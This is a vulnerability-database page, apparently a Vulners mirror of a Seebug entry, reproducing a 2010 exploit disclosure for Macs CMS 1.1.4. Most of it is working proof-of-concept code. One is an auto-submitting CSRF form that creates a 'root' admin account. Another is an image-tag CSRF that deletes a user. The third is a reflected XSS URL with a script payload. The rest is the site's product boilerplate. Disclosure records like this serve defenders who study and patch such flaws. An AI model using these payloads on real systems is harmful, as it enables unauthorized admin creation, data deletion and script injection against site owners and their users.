Lucene search
K

Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) by 10n1z3

Code

                                                <!---
    Title: Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF)
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Sun 11 Jul 2010 11:53:35 AM EEST 
    Vendor: http://macs-framework.sourceforge.net/
    Download: http://sourceforge.net/projects/macs-framework/
--->

-=[ CSRF PoC 1 - Create Admin User ]=-
    
    <html>
        <head>
            <title>Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) - Create Admin User</title>
        </head>
        <body onload="document.csrf.submit();">
                <!--- Edit these --->
            <form name="csrf" action="http://[domain]/index.php/main/cms/saveUser" method="post">
                <input type="hidden" name="ajaxRequest" value="true" />
                <input type="hidden" name="username" value="root" />
                <input type="hidden" name="password" value="rootroot"/>
                <input type="hidden" name="confirmPassword" value="rootroot" />
                <input type="hidden" name="emailAddress" value="[email protected]" />
                <!--- Do not edit below --->
                <input type="hidden" name="roleId" value="1" />
            </form>
        </body>
    </html>
    
-=[ CSRF PoC 2 - Delete User ]=-
    <img src='http://[domain]/index.php/main/cms/deleteUser?userId=2' />
    
-=[ XSS PoC ]=-
    http://[domain]/index.php/footer/search?searchString='><script>alert('xss')</script>
    
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
14